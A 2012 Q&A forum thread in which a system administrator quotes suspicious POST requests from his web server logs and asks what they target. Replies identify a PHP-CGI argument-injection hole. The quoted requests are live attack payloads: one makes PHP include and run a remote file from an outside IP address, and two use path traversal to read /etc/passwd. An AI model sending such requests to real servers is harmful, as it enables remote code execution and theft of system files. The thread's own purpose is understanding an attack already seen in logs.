What do these requests to the server do?

B

baalmor2012-12-07 14:20:35

System administration

baalmor, 2012-12-07 14:20:35

Hello.
I looked through the logs of requests to the www server and found such an interesting POST request. Could you tell me what the author was trying to achieve?

&quot;POST /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://129.171.178.13/pmwiki/api.gif%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://129.171.178.13/pmwiki/api.gif%20-n HTTP/1.1&quot;

along the way,

&quot;POST /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D../../../../../../../../../../../../etc/passwd%00%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D../../../../../../../../../../../../etc/passwd%00%20-n HTTP/1.1&quot;

and

&quot;POST /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D../../../../../../../../../../../../etc/passwd%00%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D../../../../../../../../../../../../etc/passwd%00%20-n HTTP/1.1&quot;

with these two requests, the essence is clear, but it is not clear what they were trying to exploit. Can someone satisfy my curiosity and maybe give me a warning? )
Thank you.

Reply

Answer the question

In order to leave comments, you need to log in

3 answer(s)

[

[email protected]><e, 2012-12-07
@baalmor

Looks like a relatively recent vulnerability (see comments ).

D

den1n, 2012-12-07
@den1n

We tried to get the contents of the password file via the PHP instructions auto_prepend_file, allow_url_include.

E

egorinsk, 2012-12-07
@egorinsk

The hole was in PHP, if it is used in Cgi mode, then with a certain confluence of stars, this data is passed to it as command line parameters and causes the code to be executed.